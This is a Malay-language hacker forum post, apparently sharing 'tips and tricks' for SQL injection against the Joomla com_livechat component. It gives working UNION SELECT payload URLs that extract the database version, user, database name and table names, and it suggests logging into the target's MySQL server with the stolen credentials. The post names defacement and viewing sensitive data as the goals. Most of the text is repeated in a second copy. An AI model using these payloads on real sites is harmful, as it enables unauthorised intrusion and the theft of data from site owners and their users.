Hmm.. banyak exploit code pasal joomla component yang selalu dipublishkan kat milw0rm. Tapi problemnya, bila kita nak crack hash yang kita dapat, payah.. sebab dia ada salt.
Tadi aku ada nengok sikit code authentication joomla ni, rasanya macam paham la sikit2.. insya ALLAH ada masa nanti aku bincangkan kat sini. (letih dah ni.. nak tidor)
Aku ada buat sikit test, tujuan kita/hackers nak hack website ni ada dua.
1. nak deface
2. sekadar poc/nak view maklumat yang mungkin sensitif
Secara peribadi, aku ni jenis yang no 2 kot smiley
So kat sini aku bagi sikit tips dan trick. (Aku memang minat SQL injection, so aku manipulate sikit exploit com_livechat tu)
Macam biasa, mula-mula dapat version number dulu smiley
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,@@version,3
Pastu dapatkan username system/database. Untuk password tu pandai-pandai la yer. Bila dah dapat, try scan target. Kalau port mysql dibuka, why not connect dengan target mysql tu menggunakan credentials yang kita dapat? smiley
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,user(),3
NI pulak untuk dapatkan nama database. Benda ni amat berguna untuk step step yang lebih advance
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,database(),3
Cuba carik table lain selain dari table joomla tersebut. Mungkin ada table lain yang menyimpan data yang lebih menarik smiley. NI codenya
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,table_name,3+from+information_schema.tables+limit+0,1/*
Tadi aku ada nengok sikit code authentication joomla ni, rasanya macam paham la sikit2.. insya ALLAH ada masa nanti aku bincangkan kat sini. (letih dah ni.. nak tidor)
Aku ada buat sikit test, tujuan kita/hackers nak hack website ni ada dua.
1. nak deface
2. sekadar poc/nak view maklumat yang mungkin sensitif
Secara peribadi, aku ni jenis yang no 2 kot smiley
So kat sini aku bagi sikit tips dan trick. (Aku memang minat SQL injection, so aku manipulate sikit exploit com_livechat tu)
Macam biasa, mula-mula dapat version number dulu smiley
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,@@version,3
Pastu dapatkan username system/database. Untuk password tu pandai-pandai la yer. Bila dah dapat, try scan target. Kalau port mysql dibuka, why not connect dengan target mysql tu menggunakan credentials yang kita dapat? smiley
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,user(),3
NI pulak untuk dapatkan nama database. Benda ni amat berguna untuk step step yang lebih advance
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,database(),3
Cuba carik table lain selain dari table joomla tersebut. Mungkin ada table lain yang menyimpan data yang lebih menarik smiley. NI codenya
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,table_name,3+from+information_schema.tables+limit+0,1/*